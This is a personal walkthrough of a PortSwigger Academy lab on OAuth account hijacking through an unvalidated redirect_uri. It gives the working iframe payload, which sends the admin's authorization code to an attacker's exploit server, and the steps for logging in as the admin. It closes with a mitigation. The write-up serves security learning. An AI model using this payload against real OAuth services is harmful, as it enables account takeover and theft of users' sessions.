PortSwigger Academy Lab: OAuth account hijacking via redirect_uri
Task
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users’ accounts.
To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete the user carlos.
The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.
You can log in with your own social media account using the following credentials: wiener:peter.
Attempt
First I started inspecting the OAuth login process, logging in, out and back. After the successful login, OAuth redirected me to the call back url with an authorization code:
https://ID.web-security-academy.net/oauth-callback?code=BchvzFbYElMy-4mlOZSwcnkbtePm9G9Co3XK-mLERDf
After sending this GET request:
/auth?client_id=zy4g0bz0ue0ljgdsusgzm&redirect_uri=https://ID.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email
Got redirected:
HTTP/2 302 Found
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Location: https://ID.web-security-academy.net/oauth-callback?code=cqvQoewauw91YogGTmsKirDqV23D4GTZD-SZo5XQ_A7
Sent the request to Repeater. I first tried to start the http server myself and host an html file with :
python3 -m http.server 9000
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>OAuth Exploit</title>
</head>
<body>
<h1>Click here/h1>
<iframe src="https://oauth-ID.oauth-server.net/auth?client_id=zy4g0bz0ue0ljgdsusgzm&redirect_uri=http://localhost:9000&response_type=code"></iframe>
</body>
</html>
Then I realized there was literally an ‘exploit server’ feature on the page. Replaced the redirect url with https://exploit-ID.exploit-server.net/exploit and observed the access log.
Craft the payload at the exploit server:
<iframe src="https://oauth-ID.oauth-server.net/auth?client_id=zy4g0bz0ue0ljgdsusgzm&redirect_uri=https://exploit-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>
Delivered this exploit to the admin and got the code. Logged out and logged in as the admin:
https://ID.web-security-academy.net/oauth-callback?code=AdminCode
On the admin panel, deleting carlos solved the lab!
Mitigation
Restrict redirect URLs
Desirably validate that the redirect_uri parameter exactly matches one of the pre-registered URIs. At least do not allow external urls.